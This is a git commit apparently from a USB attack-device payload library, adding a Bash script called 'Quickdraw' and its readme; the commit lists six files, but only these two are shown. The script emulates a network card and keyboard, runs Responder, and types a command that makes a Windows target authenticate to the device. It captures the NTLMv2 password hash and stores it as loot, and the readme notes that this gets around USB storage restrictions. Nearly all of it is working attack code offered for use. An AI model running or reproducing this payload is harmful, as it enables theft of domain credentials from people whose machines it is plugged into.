Bunnyhound and Quickdraw added (#343)

* Add files via upload Initial payload * Add files via upload Initial payload
2025-10-29 16:58:25 +00:00 · 2018-05-20 16:23:53 -05:00
parent be78dafbfc
commit 9fab25740d
6 changed files with 631 additions and 0 deletions
--- a/payloads/library/credentials/Quickdraw/payload.txt
+++ b/payloads/library/credentials/Quickdraw/payload.txt
@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title:         Quickdraw
+# Author:        golem445
+# Version:       1.0
+# Dependencies:  Responder
+# Runtime:		 ~8 seconds
+#
+# Sets up Ethernet and HID keyboard interfaces simultaneously,
+# runs Responder, then uses HID to generate an NTLMv2 hash
+# response from the target computer.
+
+# Prereq check
+REQUIRETOOL responder
+
+# Begin attack setup
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+GET TARGET_HOSTNAME
+LOOTDIR=/root/udisk/loot/quickdraw
+
+# Prep loot logging
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+cd /tools/responder/
+rm logs/*
+
+# Begin Responder
+LED ATTACK
+python Responder.py -I usb0 -wfvr &
+
+## Start HID Attack
+sleep 1
+RUN WIN cmd
+Q DELAY 250
+Q STRING "powershell \\\\172.16.64.1\\s"
+Q ENTER
+Q STRING "exit"
+Q ENTER
+
+# Wait for NTLMv2 capture to complete
+LED STAGE2
+until [ -f logs/*NTLM* ]
+do
+     sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync the file system
+sync
+
+## Finished
+LED FINISH
--- a/payloads/library/credentials/Quickdraw/readme.md
+++ b/payloads/library/credentials/Quickdraw/readme.md
@@ -0,0 +1,26 @@
+# Quickdraw
+* Author: golem445
+* Version: 1.0
+* Target: Windows Domains
+
+## Description
+
+Sets up Ethernet and HID keyboard interfaces simultaneously,
+runs Responder, then uses HID to generate an NTLMv2 hash
+response from the target computer.
+
+Note: This module will bypass network restrictions on USB
+disk drives as only a network card and keyboard are emulated.
+
+## Requirements
+
+Responder should be installed
+
+## STATUS
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| Flashing Red        | Responder not found                      |
+| Solid Violet        | Setup for attack                         |
+| Flashing Amber      | Attack in progress                       |
+| Solid Green         | Attack complete                          |